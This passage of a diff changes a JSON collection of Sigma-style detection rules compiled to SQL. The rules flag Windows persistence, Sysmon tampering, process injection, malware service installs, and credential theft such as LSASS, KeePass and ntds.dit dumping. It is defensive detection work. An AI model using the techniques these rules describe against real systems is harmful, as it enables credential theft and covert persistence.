- "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program 
Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "KrbRelayUp Service Installation", + "id": 
"e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environnement" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1112" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND 
(OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "status": "experimental", + "description": "Detects NetSupport Manager service installation on the target system.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrative action" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 
'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate administrative action" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Host connections to valid domains, exclude 
these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "status": "test", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Legitimate administrative action" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') 
OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": 
"052ec6f6-1adc-41e6-907a-f1c813478bee", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' 
ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + 
"Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage 
LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", + "status": "experimental", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Antivirus products" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": 
